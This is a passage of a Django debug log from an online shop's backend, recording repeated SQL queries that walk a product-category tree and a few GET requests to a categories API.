"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:09:14,516 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:09:14,520 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:09:14,523 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:09:14,527 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:09:14,534 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:09:14,538 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:09:14,543 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:09:14,548 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:09:14,551 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:09:14,558 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:09:14,562 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:09:14,566 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:09:14,569 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:09:14,571 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:09:14,575 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:09:14,578 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:09:14,581 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:09:14,583 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:09:14,586 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:09:14,588 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:09:14,591 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:09:14,593 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:09:14,595 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:09:14,598 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:09:14,601 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:09:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:09:14,705 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 14:09:14,713 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 14:09:14] "GET /api/v1/categories/10 HTTP/1.0" 200 353 [19/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 14:10:35,927 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:10:35,934 utils 4252 140031492613888 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 14:10:35,942 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:10:35,946 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:10:35,948 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:10:35,951 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [19/Dec/2019 14:10:35] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 14:10:35,955 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:10:35,957 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:10:35,960 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:10:35,962 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:10:35,964 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:10:35,968 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:10:35,970 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:10:35,973 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:10:35,975 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:10:35,977 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:10:35,981 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:10:35,983 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:10:35,985 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:10:35,988 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:10:35,990 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:10:35,994 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:10:35,996 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:10:35,999 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:10:36,001 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:10:36,003 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:10:36,005 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:10:36,009 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:10:36,011 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:10:36,013 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:10:36,015 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:10:36,017 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:10:36,021 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:10:36,023 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:10:36,025 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:10:36,027 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:10:36,030 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:10:36,033 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:10:36,035 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:10:36,038 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:10:36,040 utils 